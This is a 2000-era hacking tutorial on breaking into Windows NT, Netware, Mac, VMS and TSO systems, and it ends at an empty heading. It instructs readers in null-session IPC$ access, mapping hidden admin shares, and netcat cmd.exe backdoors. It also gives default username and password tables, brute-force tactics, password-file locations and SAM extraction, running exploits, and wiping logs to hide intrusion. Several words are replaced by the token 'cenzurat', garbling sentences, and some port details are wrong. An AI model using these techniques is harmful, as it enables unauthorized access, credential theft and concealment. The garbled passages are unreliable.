How To Break Into Computer Systems – Part2

* How To Break Into Computer Systems – Part2

- Release 3.0 -

Portwolf, 2000

E-mail

Information Insemination
__________________________________________________
Windows NT
Netware
Miscellaneous OS’s
“Unbelievable… a Hacker!”
Elite Hacker Tactics
System Exploits
Firewall Penetration
__________________________________________________

Windows NT
Until recently, UNIX machines make up the vast majority of machines on the Internet. Windows NT (New Technologies) has eaten up some of that percentile. Now, somewhere between 10% and 20% of machines you’ll find on the Net are NT boxes. NT machines ship and are compatible with almost as many services as UNIX, with a few differences. Generally, you won’t find as many open ports on a Windows box because they don’t use raw sockets like the various flavors of UNIX (a socket is a two-way connection between two computers, using any protocol). NT Server ships with IIS – a HTTP and FTP service. cenzurat servers can also be purchased for NT machines. SMTP and POP3 servers come with Microsoft Exchange Server, which is pretty commonplace. One port that will give your target away as a Windows box is an open port 139. This is the port for NBT, or ‘nbsession’ according to some portscanners. UNIX machines use strictly TCP/P for communications (making them ideal machines for the Internet), whereas NT uses Net BIOS (Net BIOS does not work over the Internet, so NT Servers must utilize Net BIOS over TCP/IP in order to do so), or what they call NetBEUI (Net BIOS Extended User Interface – which also uses Server Message Block, or SMB). To connect to an NT machine, you must use Microsoft Client. Using MS Client to connect to a Net BIOS ports on a Windows machine is similar in nature to telnetting to port 23 on a UNIX machine. If you have Windows 95 / 98 / NT, you have Microsoft Client. It might not have it installed though. To check, go to Control Panel, then Network. You should then see a list of protocols you have installed on your machine. In order to use MS Client, you need NetBEUI, Client for Microsoft Networks, and (of course) TCP/IP. If you are missing any of these, click on ‘Add’ and add the appropriate client or protocol (you’ll probably need Windows disks). Also, some NetBEUI stuff only works if you have the latest version of Dial-Up Networking. Go to microsoft.com for the update. To use MS Client, open a DOS box. The command you will be using is ‘net.’
Type ‘net’ to see a list of Net commands. Some of these cannot be issued from a DOS windows. The two you as a hacker should be concerned with are ‘net view’ and ‘net use’. If ever you come across a machine with an open port 139, there is a chance that the machine has open shares on it. A Windows share is a directory somewhere on the server (be it Windows 95, 98, or NT) that is set up to be accessed by others in the network. Sometimes they are password protected, sometimes not. Once connected to a share, you can use regular DOS commands (cd, mkdir, edit, etc.) to move about and manipulate files within it.
Shares come in two varieties: share level and user level. Share level (usually only found on Win9X peer-to-peer networks) shares are protected only by a single password. Anyone knowing that password can access that folder. User level shares are more UNIX-ish, in that your access to them depends on who you are logged in as. Unfortunately, you can only log into an NT machine if you have NT yourself (either NT Workstation or NT Server). When NT admins setup user level (NTFS) shares, they determine what users and groups (similar to UNIX groups) can access them. To look for shares on an NT box, at a DOS prompt type:

net view \\ip_address

If you get a message back saying that you need to log in before using net commands, you either don’t have the latest DUN, or you aren’t logging into your own machine (at the Windows Login screen). If the machine has shares (and most NT servers do), you’ll see something like:

Share Description
——- —————-
mktg Marketing folder
lpt1 Printer 1
acct Accounting folder

Here there are two shared folders, and a shared printer. If you have Windows 95 or 98, you’ll only be able to connect to these shares if they’re share level (not user level). To do so, type:

net use x: \\ip_address\sharename

Where x is the drive letter you want to map the share to. So if you wanted to connect to map the mktg folder to your i: drive, you’d type:

net use i: \\123.54.87.9\mktg

If you get the message ‘The command completed successfully,’ your drive i: is now the mktg folder on your target machine. If you’re prompted for a password, the share is either share level and password protected, or user level and you won’t be able to map to it. You also may just plain be denied access. Once you decide to get an NT partition on your hard drive, you’ll be able to log in. So, if you knew that the Administrator (superuser – equivalent to root on a UNIX system) password was ‘letmein’, you’d type:

net use i: \\123.54.87.9\acct letmein /user:Administrator

to map i: to the user level share acct from your NT machine. You can also map a drive GUI, by right-clicking on My Computer, and then on ‘Map Network Drive.’ Another way to connect to NT machines is with the nbtstat command. To get very useful info on a particular NT box, at a command prompt, type:

nbtstat -A ip_address

If the machine is NT and has port 135 or 139 open, you’ll see a table full of valuable info. It might look something like:

Net BIOS Remote Machine Name Table
Name Type Status
———————————————————
srv3 <00> Unique Registered
r7labs <00> Group Registered
srv3 <20> Unique Registered
srv3 <03> Unique Registered
ghost <03> Unique Registered

The hex code in anglebrackets ( <these things> ) tells us what each entry in the table means. A code of 00 means NetBEUI name. The first entry, srv3 <00> tells us that this is a name, and the Unique tells us that its the name of that computer. You now have the NetBEUI (Windows name) name of that box. The second entry, r7labs <00> is also a name, and the Group tells us that this is the domain name. This is the Windows domain name – not necessarily the Internet domain name. The srv2 <20> code means that this machine has file sharing enabled – which means you’ll probably find shares with a ‘net view.’ Appendix C of this text has explanations for each hex code you’ll find with an nbtstat.

Another way to connect to an NT machine is to add it to your lmhosts file (in your windows directory). Open a file called lmhosts (with no extension), and edit like so:

ip_address netbeui_name #pre

where ip_address is the IP address of your target, and netbeui_name is the name you got from the nbtstat. For an example, look at your lmhosts.sam file (but don’t use this file, only use lmhosts with no file extension). Next you want to load the file into your NetBEUI memory cache, with this command:

nbtstat -R

Now, go to your Start button, then Find, then computer, and type in the NetBEUI name of the computer. An icon representing that computer will appear – right click on it and then click ‘explore’ to connect to the machine. This is the GUI way to connect to NT machines. Again, if you’re not using NT, you won’t be able to log in.
Once connected, you’ll want to see what kind of permissions you have. Create and erase a file. Make and delete a directory. You could have only read permissions, or you may have read and write (read files and modify them). Standard DOS commands work, and any mapped network drives will also appear in Windows Explorer as if it were on your local machine (similar to UNIX NFS).
One thing that puts NT apart from UNIX is its Client/Server-ness. If you telnet to a UNIX box and run a program, it will be run on that machine, using its CPU and RAM. If you map a network drive to an NT server and run a command, it will be launched and ran on your computer, using your resources. So if you upload an exploit, map a drive, and double-click on the sploit with Explorer, the exploit will run on your computer. It is possible to get programs to run on that machine instead of your own, which will be explained in the ‘Unbelievable…A Hacker!’ section.

Hacking NT
Most of the time shares will be user level, or at least password protected user-level. And if you aren’t logged in, net view’s will report no open shares (why would the system tell you what folders are shared to someone who hasn’t logged in?). So you have a few options. You could get the password hashes and crack them with L0phtCrack (explained later). Or, you could use Brute Force: write a batch file that connects to the share, then spits passwords from a wordlist (available all over). If you aren’t skilled at writing batch files, get yourself a good DOS book, and at least find out about commands and DOS environment variables. You could make yourself quite a powerful brute force share-cracker batch file in under 20 lines. I personally use VB for brute force engine making. Also, if you want to quickly search an entire (or even multiple) subnet(s) for open shares, use a share scanner such as Legion. But most likely you wont be able to see (let alone map to) anything at first. So here are some steps to take in breaking into an NT server.
Follow steps one, two, and three in the ‘Getting Started – You’re First Night as a Newbie’ section. Once done, you should have a handful of usernames, as well as know what ports are open on what machines, and what services are running on those ports. If port 21 is open, its probably IIS. If you can get in anonymously (username ‘ftp’ with any password), try using this command:

cd /c

Once in a while a misconfiguration will bring you to the systems actual root directory (where as with normal anonymous access you can’t go very high in the hierarchical filesystem). This usually doesn’t work, but is worth a shot. Use one of the cenzurat methods explained earlier to determine the webserver (if port 80 is open). Both IIS and FrontPage are plagued with vulnerabilities. How to exploit these is explained in the ‘System Exploits’ section.
Any share that’s name ends in a dollar sign is hidden, and won’t show up in a net view or if you use the GUI approach to viewing shares. To connect to them, you only need to refer to them by name. Common hidden shares are:

c$ The entire C: drive
d$ The entire D: drive (if its another hard disk or partition)
admin$ The \%systemroot% (\winnt) directory
ipc$ Inter-Process Communications – not really a share (explained shortly)

By default, all drives are shared but hidden, as is the winnt directory. So map your drive e: to your target’s c: drive, you’d simply type:

net use e: \\38.57.128.2\c$ password /user:username

Or you could do it the GUI way (with nbtstat or Map Network Drive).
Another way to hack in would be to put a Trojan on the server. Netcat is a program you can use to bind programs to ports. One way to allow yourself a back door to a system is to bind cmd.exe (similar to Win9X’s command.com) to a port. NCX and NCX99 (available at technotronic.com) do this for you. Once you bind cmd.exe to port 80 or 99, you can telnet in and get a DOS prompt (how very UNIX like!)
Your ultimate goal is probably to get the password file. Unfortunately, NT stores the password hashes in the registry. Sometimes you’ll find a backup copy in \winnt\system32\repair\sam._, but if not you’ll have to resort to other methods of getting them. Once you do, you’ll use L0pht Crack to crack them.
A few programs will also aid you in hacking into NT networks. Ogre is a very useful NT scanning utility. It will scan ports, net view, and nbtstat every machine in an NT network. NAT is also a powerful Brute Force engine, and can log into NT networks even from an Win9X machine (though to log in yourself, you’ll still need NT). For more advanced NT vulnerability exploits, read the ‘System Exploits’ section. For more NT commands that you’ll need, type ‘net’ at a command prompt. For more info on each net command, type:

net command /?

NAT is a great tool for BF-ing NT machines too. Take your list of valid usernames and put them into a file for NAT to use, and user a small password file (the one that comes with NAT is good – add a few password guesses of your own too). Also, the latest version of Legion (2.1) will not only scan for shares, but will attempt to brute force any it finds, if the user so desire. Both programs are made by the Rhino9 team, NT hacking experts.

Here’s a newer vulnerability in NT. Remember the hidden ipc$ share? As I said before, its not really a share, per say: its not a shared folder. Its a channel used by NT Domain Controllers (PDC’s and BDC’s) to exchange network information two each other. And a hacker could theoretically use this ‘channel’ to break in. Remember how groups work in NT. Like UNIX, certain files and folders are accessible only two certain users or groups. One built-in group of NT is called ‘Everyone’, which encompasses anyone logged into the domain. It’s possible for someone to connect to the IPC share, and masquerade as an NT Domain Controller, and by doing so, becoming a member of the ‘Everyone’ group. Without even logging in. Consider the following.

C:\hacker_toolz>net view \\202.53.198.1
System error 5 has occurred
Access Denied

NT Server 202.53.198.1 just told us to go to hell since we haven’t logged in. Heh – watch this:

C:\hacker_toolz>net use \\202.53.198.1\ipc$ “” /user:”"

We just connected to the IPC share with a username of null (meaning none: /user:”", and a password of null (”". Also, notice that we didn’t specify a drive letter to map IPC to, since its not a standard share. What we’ve done is connect to 202.53.198.1’s IPC share in the exact same way another Domain Controller wishing to exchange data would. And that makes us part of ‘Everyone.’ It thinks we’re another server in its domain. Now watch:

C:\hacker_toolz>net view \\202.53.198.1
Shared resources at 202.53.198.1:
Share Description
—————————————-
folder1 Mngr’s Folder
usenet NNTP
printer Printer

Now that we’re part of ‘Everyone’, the server just spilt its guts to us, when seconds ago it wouldn’t. This only works if the server you’re net view-ing is configured to allow the Everyone group to browse it. Can we map network drives to these shares and explore? There’s a good chance of that. You can also use the user2sid and sid2user tools (available at www.hackingexposed.com) to glean usernames (which makes brute force much easier). This is a well known vulnerability that is easily solved, but you’ll find this tactic works on lots of NT Servers.

One last note on NT hacking. The WINS (Windows Internet Naming Service) protocol is responsible for translating NetBEUI names (Net BIOS uses computer names instead of addresses) to IP addresses. To look at the WINS configuration of any computer, use the nbtstat command. Furthermore, the file lmhosts on any windows machine will act as a mini WINS table if WINS itself is disabled (TCP/IP properties under Control Panel > Network).

Novell Netware
UNIX machines still claim most machines on the Net. NT is catching up, and between the POSIX and Win32 platforms, you wont find much else on the Internet. Once in a great while, however, you just might run into a completely different operating system. Novell Netware used to be the biggest Client/Server Network Operating System around, and rivals NT to this day. So just in case you run into one of these foreign systems, here is a little info on Novell Netware.
NT’s core protocol (integrated with Net BIOS) is SMB. Netware, on the other hand, uses NCP (Netware Core Protocol) as its main protocol for serving files. Netware has been around for quite some time – the first version was command-line and sat on top of DOS. Now GUI clients exist for it, and version 5.X has been released. Like Windows NT, computing is not centralized (like UNIX), and resources are distributed among the network. One computer may be a print server, on might be a mail server, another a file server. The thing that makes Netware unique is what’s called the NDS database, or Novell Directory Services. The NDS is a little comparable to an NT network’s PDC’s registry. It is a hierarchical representation of the entire network. Everything on the network (users, servers, printers, logon scripts, etc.) is represented by an appropriate object in the NDS database. At the root of the NDS tree is the object ‘root,’ similarly to a root directory. Stemming from the root object, are one or more ‘organizational’ objects, comparable to subdirectories. Inside these objects can be more organizational objects, or what are known as ‘leaf’ objects, comparable to files. These leaf objects are what make up the conceptual network. Leaves include user objects, representing users of the network, server objects, representing servers, and so on. The organizational units exist for no other reason to conceptually organize the network. The whole idea of an NDS is sometimes hard to grasp at first, due to its being so abstract, but greatly eases administration.
When you refer to a specific file on a hard disk, you refer to its path. When you refer to an NDS object’s location, you refer to its context. Paths start with root at the left, such as:

C:\Winnt\programs\file.ini

Contexts, on the other, hand, start with the root at the right, such as:

.user22.market.UAS

where user22 is the object we are referring to. We don’t need to specify root because its assumed that root is always after the last organizational unit listed. The context above specifies the user22 object, which is in the organizational unit ‘market,’ which resides in the organization ‘UAS.’ When referring to objects absolutely (full context), you must start the context with a periods (.), and separate each entry with a period also. Now if your current working context was .market.UAS (same concept as a current working directory), you could refer to user22 relatively (just as in UNIX or DOS filesystems) with simply:

user22

with no period.
Now, Netware networks are usually GUI interfaces. If you ever connect to a Novell server over the Net, you will have to navigate it commandline, though, unless you want to download GUI clients from www.novell.com. Mapping network drives to Netware volumes (similar to a Windows share) as you would to an NT machine, with the MAP command. You would change your context and navigate the NDS with the CX command. In order to do this, you will need to get your hands on a Netware client. You can get a free command-line client at www.novell.com. Client32 is a good one.
Now each user in a Novell network is represented by a user leaf object on the NDS tree. So to log in as user22 who’s object is in the marketing.UAS container, you have to log in as:

.user22.marketing.UAS

Mapping drives to Netware volumes (a volume is just like an NT share) is done in one of two ways. You can either specify the server name you are connecting to physically, such as:

map x: servername/volumename

or by its NDS object, such as:

map x: server_nds_object:volumename

When trying to break into a Novell server on the net, with say, an IP address of 212.14.6.2, you would issue this command (with a Novell client in a DOS box):

map x: 212.14.6.2/datafiles

where datafiles is the volume you want to connect to. It is beyond the scope of this text to get into great detail about all the commands and innerworkings of Netware, so feel free to jump into a Netware book. Really.

Hacking Netware
Breaking into Netware servers is just like hacking into anything else: you need to know as much as you can about the OS. Plenty of exploits exist for Netware – www.hackers.com has a lot. So, if you want to crack a Novell system, complete steps one, two, and three of the ‘Getting Started – Your First Night as a Newbie’ section. Try to Brute Force the usernames you find. Also, there are a few public volumes attached to each Netware server by default.

Logon This is accessible to everyone – logged on or not.
Public This is accessible to anyone logged on, no matter who.
Sys This is the system volume – phun to explore.

Here are some commonly used login names and passwords for Netware:

Username Password
Admin operator, supervisor, sysadm
Backup
Guest visitor, user
Netware
Novell NetWare
Public
Remote
Server
Staff
Supervisor admin, operator, sysadm, supervis, manager
System1
Tape backup
Test testuser
User
Visitor guest

Also, brute force programs and password crackers exist for Netware by the truckload, as well as exploits and other handy Novell hacking utilities. If you’re serious about hacking a Novell system, familiarize yourself with them.

Miscellaneous OS’s
Most of the systems you’ll find will be some sort of UNIX. A lot will also be NT. And a few might be Netware. And that’s about all you’ll find while exploring the Internet. But if you find yourself trying to break into a machine via its dialup modem, you might be connecting to an older mainframe. Twice in my life, though, I have telnetted to a machine to find the unfamiliar logon screen of a mainframe as well. Also, you might (which, by the way, happened to me) target a network for some reason – to find out that it’s a network of Macs (ugh)! I’m not going to spend much time on OS’s other than NT and UNIX, but here’s a little info on some others you might run into. For more info, hit a search engine or get a book.

MacOS
I hate Macs. Any OS without a command-line isn’t worth my time, and in my humble opinion, should be forced upon AOL users. Hackers generally like the OS’s that they hack into – which is why they stay up until four in the morning trying to break in. But you might have a more specific motive to breach the security of a particular network, and if it’s a Mac network, you’ll have to learn a little bit about it. Just don’t admit to it.
Macs connect using the proprietary protocol Appletalk. Surprisingly, this protocol is routable. Each subnet (a term that will confuse most any Mac user) is called a Zone. Appletalk can be run over IP, for the purpose of talking TCP/IP networks. If the Appletalk network in question is connected to the Net, at least the proxy server has to have this dual protocol capability. If you ever find a Mac machine on the Net with a valid IP address, it is running Appletalk over TCP/IP.
The protocol used to share resources is called AppleShare. AppleShare is (at its application level) similar to NetBEUI. Folders are flagged as ’shared,’ and thereby made available to the rest of the network. Some are password protected, and require a username and password. Mac sysadmins tend not to be to security-savvy, though, and Guest access is usually possible. To access these folders, your computer will need to speak Appletalk, and you’ll need a client to connect to AppleShare servers. TSSTalk (available at www.thursby.com) is a free program that will configure both requirements for you. All you have to do with it is enter the IP address of the Mac, and it will show up on your Network Neighborhood. Double-click the computer icon and you’re off to hacking.

VMS
VMS (Virtual Memory System) was a popular mainframe OS a few years back. It runs on VAX machines, and rivaled UNIX in it popularity for hackers to try to crack. Finding a VAX on the Net is an extremely rare find, but finding one on the end of a dialup link isn’t so. One thing that is stereotypical about VMS is its potential for security. If the VAX sysadmin knows what he’s doing (at rarely do complete idiots run OS’s as complex as VMS), the system can be very secure, including extensive logging, encryption schemes, restrictive privilege rules, and even hacker traps.
Many VAX machines are interconnected via MultiNet, making the VAX network a bit more client/server. The prompt of a VMS system looks something like:

$DISK3:[user21]

Where DISK3 means you’re currently on the third disk (most VAX’s have multiple disks, just like you can have a C: hard disk and a D: hard disk) and you are in the directory ‘user21′, which is probably a home directory. Once at a prompt, you can issue a variety of commands. ‘Telnet’ and ‘ftp’ both work, and function like their counterparts in the UNIX world. You can use ‘dir’ or ‘directory’ to get a listing of your present working directory. If you do, you might see something like:

Text4 [users, user21]
App2 [users, admin]

Where text4 is the name of the file, and the brackets represent permissions. User21 owns the file text4, and is in the ‘Users’ group. With the command ‘cdup’ you can jump to the root directory of your disk, at which point your prompt would look like:

$DISK3:[000000]

And if you wanted to view a file, you’d use the ‘type’ command, just like in DOS. ‘Rm’ deletes files, like in UNIX. ‘Rmdir’ removes an entire directory, and ‘mkdir’ creates them. You must have the appropriate permissions in your PWD to do this, of course. If ever you try to read, copy, move, run, or delete a file, you might get a message like:

<%RMS-E-PRV, insufficient privilege or file protection violation

Meaning you don’t have the privileges to access the file in question.
VAX machines on the Net will have very few ports open, so your hacking options will be limited. And if you dial into the mainframe, that’s (obviously) your only point-of-entry. Brute force is the only for-sure way to get that initial account and further hack a VAX. Here is a list of commonly used usernames and passwords for VMS:

Username Password
SYSTEM OPERATOR, MANAGER, SYSTEM, SYSLIB
OPERATOR OPERATOR
SYSTEST UETP, SYSTEST, TEST
SYSMAINT SYSMAINT, SERVICE, DIGITAL
FIELD FIELD, SERVICE
GUEST GUEST, (unpassworded)
DEMO DEMO, (unpassworded)
TEST TEST
DECNET DECNET

TSO
I include IBM’s TSO only because I’ve seen a couple on the Net, and dialed into a few. You’ll know a TSO machine by either its login prompt:

IKJ56700A ENTER USERID:

Or by the way it responds to a bad login:

IKJ56943I USERID (whateveryoutyped) NOT AUTHORIZED TO USE TSO

And if you do login, you’ll either be presented with a menu system or a command prompt. Old colleges sometimes connect TSO machines to their network to hold legacy databases, such as books and the like. If you’re presented with a menu system, issue a variety of obscure (and long) commands to break out into a prompt. If you enter an invalid command, you’ll usually get an error message that says something about ‘an unrecognized transaction.’ Here are a list of commonly used TSO login names and passwords.

Username Password
Admin adm
Guest
Init
Maint
Systest test
Test1 test
Tso

There are many more mainframe operating systems out there. Most of them, though, you’ll never see, especially on the Net, since computing has become more decentralized and client/server over the years. Many hackers won’t even bother with these dinosaurs. If you ever run into one, though, and want to explore, get yourself an older hacking text, like The Neophytes Guide to Hacking (where I got some of the stuph above), or something similar. Hackers.com has a few older texts like this. I’ll personally stick to UNIX and NT.

“Unbelievable – a Hacker!”
The object of your hack will most likely be to obtain root, ie: total control over the network. With a rootshell (any shell with root privileges, such as the superuser account) you can read, write, and execute everything on the network (or at least that particular computer). To obtain root, you’ll probably have to break in with some other account first. From there you can run a local exploit, download the password file, or whatever. If its an NT machine that your hacking, you probably want either the Administrator’s account, or at least have a Trojan or RAT installed on it to give you total control. In this section I’ll go into the various means of getting root (or equivalent).

Brute Force
Brute Force is the simplest hacking technique, yet oftentimes provides results. When all else fails, you might be left with no other option than a brute force attack. This means hurling usernames and passwords at system until it cracks. Use the list of commonly used UNIX combination supplemented with this text. Spend time trying to crack individual email addresses. Honestly, you haven’t made a full-hearted brute force attempt until you’ve spent at least two or three hours doing nothing but trying different combinations. Since UNIX login prompts wont tell you if you’ve used a valid login name or not, narrow it down! Here is a quick list on how to obtain usernames:

· If port 59 (cenzurat) is open, you will be able to obtain lots of usernames. Telnet in!
· Telnet to port 25 (SMTP) and use the VRFY command to verify the existence of usernames. Type HELP for more commands.
· Any email addresses on the network’s webiste will be valid usernames.
· Look at the /etc/passwd file of any UNIX machine (including one of your own). There are tons of default usernames that get used all the time.
· NT: using a null IPC session and the SID tools (explained in the ‘Elite Hacker Tactics’ section) you’ll be able to get every username for a PC or domain.

When you first target a system, before going into finding exploits and the like, spend a few minutes BF-ing some common accounts. Wouldn’t you be pissed if you spend hours compiling an exploit to find that the root password was simply ‘root’?
Also, you could write a program (or shell script if you have a UNIX box yourself) to spit usernames and passwords from a dictionary wordlist fill at the system (available all around the Net, usually in supplement to password crackers).
If you want to become eleet eventually, you’ll need to learn at least a little about at least a few programming languages. The easiest (yet still effective) language to learn, especially for newbies, is Visual Basic. I once wrote a VB prog that used NetCat, and repeatedly telnetted to my target and spat usernames (from a list that I compiled that I knew to be valid usernames) and passwords (from a huge dictionary file), and redirected all output to my screen and a log file. I’m no programming expert, but with an hour of coding and another of debugging, all I had to do was sit back and watch as my little proggie automated a brute force attack with decent speed. Already made BF progs exist too. Unsecure is a decent one for FTP and Telnet login prompts. NAT is great for NT. Just remember – brute force will always work, eventually.

Local Xploits
A local sploit (exploit) is a program that exploits some security bug inherent in the operating system, and will greatly increase your access levels, oftentimes to root. A local exploit (as the name implies) is something you’ll have to run on the system you’re hacking. If its UNIX, you can telnet in and run it. If its NT, you’ll have to use one of the following methods to run the exploit (remember that running a program on a remote NT machine from a mapped network drive will launch it onto your computer).
· Run it with a Trojan such as Netbus or Back Orifice.
· Put the exploit in the cgi-bin directory if its a webserver, and request it with your browser.
· Use the scheduling (AT) command to run it – Admins only.
· Use NCX or NCX99 to telnet in and run it.
· Put it in a batch file and have some other user run it.

There are many exploits out there, for many different NOS’s, daemons, programs, and modules. One of the most common of these is the Buffer Overflow (also known as a Stack Overflow). This is a technique which when ran, the OS’s buffer (a container of memory set aside by the OS for data it’s working with) if filled with garbage. When the buffer is “filled,” the last string on the stack can be executed, to do such things as initiate a root shell. To use any local exploit, of course, you need to have an account that you can log into FTP with and upload the exploit from your computer to the server you want to run it on. Or if you only have telnet access, you can use vi (or some other text editor) and rewrite the exploit. Use cc or gcc to compile it if its not already (most UNIX exploits are not compiled, nor are most NT exploits). You then need to log in via telnet and run it, or launch it on the remote NT machine as explained above. Exploits are OS and version specific, and it’s sometimes hard to find one for a specific one (they are usually available all over the Internet). See the ‘System Exploits’ section for a list of more common vulnerabilities.
If you’re on a UNIX system with a non-root account, you have access to hundreds of programs. Chances are, at least one of these are vulnerable. Look up exploits for that flavor of UNIX, and you’ll most likely find at least one. To find out if a certain program exists on that machine, type one of these at a command prompt:

which program-name
whereis program-name

You’ll be told where the program resides, if it exists. To find a program or file on an NT machine that you have a drive mapped to, type:

dir /s file-name

while on the network drive.
If you can’t find a vulnerability, you’ll might want to try your hand at cracking the password file.

The Password File
Some hackers try to get this file before even using exploits, though getting it may involve using them anyways. In the /etc directory (UNIX) is a file called passwd, which holds every password for every user, along with some other information. Unfortunately for you, the passwords are encrypted. This means you’ll have to download the password file and crack it on your own computer. You’ll use a password cracker such as John the Ripper for this. Another security feature system administrators will use to keep hackers out is password shadowing. If shadowing is done (and oftentimes is), all the encrypted passwords will be replaced with *’s or x’s. These are not crackable. The real password hashes (encrypted passwords) are most likely on a different file. Here is a short list of where to find the real password file if /etc/passwd is shadowed.

UNIX Version Path
——————————————————————–
AIX 3 /etc/security/passwd
BSD 4.3 /etc/master.passwd
ConvexOS 10 /etc/shadpw
ConvexOS 11 /etc/shadow
Digital UNIX /etc/tcb/aa/user/
HP-UX /.secure/etc/passwd
IRIX 5 /etc/shadow
Linux /etc/shadow
SunOS 5 /etc/shadow
System V r4.0 /etc/shadow
UNICOS /etc/udb

Though the unshadowed file could potentially be everywhere. Use the grep command and look for files with the word ‘root’ to find potential candidates. You may not always have read access to the real file – you may have to do some stair stepping, or use a local exploit.
To give you an idea of what to look for, here is an encrypted password file:

root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu

Here is a shadowed password file:

root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh

At any rate, when you crack these, depending on the encryption strength and passwords used, you should get a handful of valid usernames and passwords. If you didn’t get the root password, you could also use one that belongs to the same group as root (such as admin or sysop). One note about root: a lot of systems are set up so that root cannot log in remotely (from outside). This means you’ll have to log in as someone else, then use the ’su’ command and enter the root password (su is used for system administrators to jump around from account to account, and stands for ’substitute user.’)
NT passwords are a little different. They are kept in the registry, not just a file like UNIX, which makes them harder to get your hands on. They are encrypted as well. There are a few ways to get them.
· Do a core dump (RAM dump) since the registry is in memory. This is not easy for beginners, and surgically removing the hashes from memory required debugging knowledge.
· Do a remote registry dump (with L0pht Crack). If the NT machine allows for remote registry sharing and you have NT at home, you can extract the password from your target’s registry over the Net.
· Get the sam._ file. If the Admin backs up the registry using rdisk.exe, the password hashes may be stored in \winnt\system32\repair or somewhere similar.

Remote registry dumps and importing the SAM hive (sam._) into L0pht Crack requires NT. Windows NT registry’s are made up of Hives. Each hive is stored in a *._ file. The hive with the passwords in it is SAM._. So why don’t you just download it like a UNIX password file? Because NT is set up not to let anyone see, copy, or modify the SAM hive. Your only hope besides the methods listed above is to boot your target machine into an alternative OS, like Linux or DOS, then get the file (NT protects the file, DOS and Linux doesn’t). This is difficult over the net. It is, however possible. Also, you’ll need a program that will allow DOS (which uses the FAT filesystem) or Linux (which uses the EXT2 filesystem) access the partition that SAM._ is on (which is in an NTFS filesystem partition). Once in a while, though, you may come across copies of the hives (all with ._ extensions) stored in a directory like ‘repair’ or ‘reg_backup’. With all the work that it takes to get NT passwords, you’re usually better off trying some other method of getting in, like exploits.

Infiltration
Again, every open port (port that you found during your portscan) is a door to the insides of that computer. To find out how each port is a potential point of infiltration for you, you’ll need to find out a little more about each protocol. Do some research. For now, I’ve provided a little info on how you can use these protocols against the computer.
Again, when you log in via a telnet port, it as if you are directly connected to and part of that network. One of the first things you should try is the “front door.” Telnet to the machine, and try some commonly used username and password combinations. Next, try each of the email addressed you’ve collected. About one in twenty people are dumb enough to use their first name or login name as their password (assuming they are allowed to set their own password), so try that too. Chances are this won’t work (though its a good idea to try anyways), so you can move on to hacking in through various ports.
Oftentimes the FTP service allows for anonymous logins (logging in with ‘ftp’ as a username and no password). When you do so, your home directory will be something like /usr/daemon/ftp or /home/ftp. However, if you issue a pwd (to find what directory you’re currently in), it will say that your pwd is / (root). This means that you are in a restricted shell. So if after logging in anonymously you cd (change directory) to lib, you will be told that you are in /lib, while you’ll really be in /home/ftp/lib, or whatever. System admins like to put /bin’s and /etc’s in the ftp directory, and in the /etc will be a password file – but don’t get your hopes up – 99% of the time its shadowed. Anonymous ftp access is really only helpful if you can download useful information.
If you see an open cenzurat port, this could be the break you were looking for. Use a cenzurat client and do a generic query (no usernames) to possibly get a list of users logged on. Next try putting an @ symbol in front of the domain you are querying, for a list of all users, logged on or not. For specific user information, type in E-mail.
The rlogin port may be another point of infiltration. This is kind of like telnet, though older and not as secure. Telnet to it and see what you can do.
The Gopher protocol was used as a text transfer protocol before the days of HTML, the WWW, and graphics on the web. If you come across a gopher port, use a browser with a built in gopher client (newer versions of Navigator and MIE) and connect to it. You’d be amazed as to what the gopher service will sometimes let you see.
Write down any other ports you see. Telnet to them all, and see what happens. If after you telnet in nothing happens, issue commands, hit enter a few times. Play around – as I said before, 80% of what you will know will come from experience, not texts.

Remote Xploits
Again, a local exploit is something you run on your victim once you’re already in. A remote exploit is something you run from your own computer that exploits a vulnerability on one of your target’s daemons. Commonly vulnerable daemons are FTP, SMTP, and HTTP. Oftentimes launching these will be logged on your target – so be sure to clean up the log files and erase any entries involving you.
Again, to exploit a daemon, find out what program it is, and what version. Search the exploit archives for an exploit for that, and if one exists, compile and run it. If the FTP port has the service wu-ftp ver 2.2.4, go out and find the exploit for that exact service of that exact version. If the SMTP port is running sendmail 8.8.8, get the sploit for it. These exploits will be in the form of C code (usually), so you’ll need to compile them. Most assume that you have specific header files (*.h), so you may need to find those as well – look at the code to be sure. To make obtaining the header files and compiling the exploits a heck of a lot easier, you ought to think about putting a Linux partition on your hard drive. At any rate, most remote exploits, if correctly implemented, when launched give you root access, or at least access. To find out what service an FTP port is running, telnet to it, it might just tell you. If not, use the SYST command, and then you’ll be told. You may have to log in to do so – try doing so anonymously. As far as SMTP, it hides its service software and version much less often that FTP does.

Elite Hacker Tactics
Up to this point, you’ve learned the basics of various NOS’s, and how the Internet works. “When will we get to the core hacking stuff?” You have been – breaking into a system is nothing more than understanding it thoroughly, knowing the ‘rules’, what you can and can’t do. Hacking is taking what you know, and using that to circumvent usually half-hearted attempts to keep casual onlookers from being where they aren’t supposed to be. Your most powerful weapon is a broad knowledge of computers and networks, and thorough knowledge of your target. Meaning go get yourself a UNIX box. Well, now that you know the basics of hacking, I’ll go into some more advanced tactics you can employ to gain access to computers on the Internet.

Service Exploitation
One of the first things you should do when you target a particular machine is telnet to every port and find out what services are running. Find out what FTP service, what POP and SMTP daemons are running (when you telnet to the appropriate port, it will usually tell you). Then go to sploit archives like www.securityfocus.com, www.roothshell.com, and subscribe to BugTraq and NT BugTraq. Look up every service/daemon you find, as well as the Operating system. Most exploits are in C, so you’ll need to put a Linux partition on your hard drive to get it to compile and run. If you have problems compiling the sploits, brush up on your UNIX C utilities. Look in the manpages for cc, gcc, and make (if there is a makefile, which makes compiling the sploits lots easier). Just remember to chmod the xploit and make it executable, or you’ll get a message that the program couldn’t be found.

CGI Exploitation
